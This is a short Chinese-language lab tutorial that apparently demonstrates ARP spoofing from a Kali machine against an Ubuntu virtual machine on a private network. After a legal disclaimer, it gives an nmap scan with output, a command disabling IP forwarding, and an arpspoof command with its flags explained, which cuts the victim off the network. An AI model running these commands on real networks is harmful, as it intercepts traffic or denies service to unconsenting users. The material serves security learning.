0.前言
本文仅供交流学习,请遵守《网络安全法》,并承诺:
1、未经允许,不得进入计算机信息网络或者使用计算机信息网络资源;
2、未经允许,不得对计算机信息网络功能进行删除、修改或者增加;
3、未经允许,不得对计算机信息网络中存储或者传输的数据和应用程序进行删除、修改或者增加;
4、不得故意制作、传播计算机病毒以及其它破坏性程序;
5、不盗用别人计算机的ip地址、网卡物理地址(mac值)和信息数据;6、不做其它危害计算机信息网络安全行为。
1.原理
Arp欺骗(中间人攻击):攻击时Kali复制路由器MAC地址,假冒路由器截取靶机数据。同理伪装客户端欺骗路由器。
2.过程
靶机:Ubuntu
攻击者:Kali
首先,使用nmap扫描目标网段,查看靶机ip地址。
nmap 192.168.110.1-255
Starting Nmap 7.92 ( https://nmap.org ) at 2024-09-17 11:46 CST
Nmap scan report for 192.168.110.2 (192.168.110.2)
Host is up (0.0039s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp filtered domain
Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.00090s latency).
All 1000 scanned ports on 192.168.110.129 (192.168.110.129) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.110.130 (192.168.110.130)
Host is up (0.0075s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 255 IP addresses (3 hosts up) scanned in 4.17 seconds
网段:同一网段指的是IP地址和子网掩码相与得到相同的网络地址。想在同一网段,必需做到网络标识相同。
获得目标的ip地址: 192.168.110.2和192.168.110.130(129为kali)。
接着阻止路由器和客户机相互转发包裹。
echo 0 > /proc/sys/net/ipv4/ip_forward
最后即可进行攻击,两者间通信会经过kali机。
arpspoof -i eth0 -t 192.168.110.130 -r 192.168.110.2
-i 为指定网卡
-t指定打击(欺骗)设备的IP
-r 指定打击路由的IP
ctrl_c 停止攻击
4.查验成果
虚拟机Ubuntu无法上网, 退出arp指令行后网络恢复。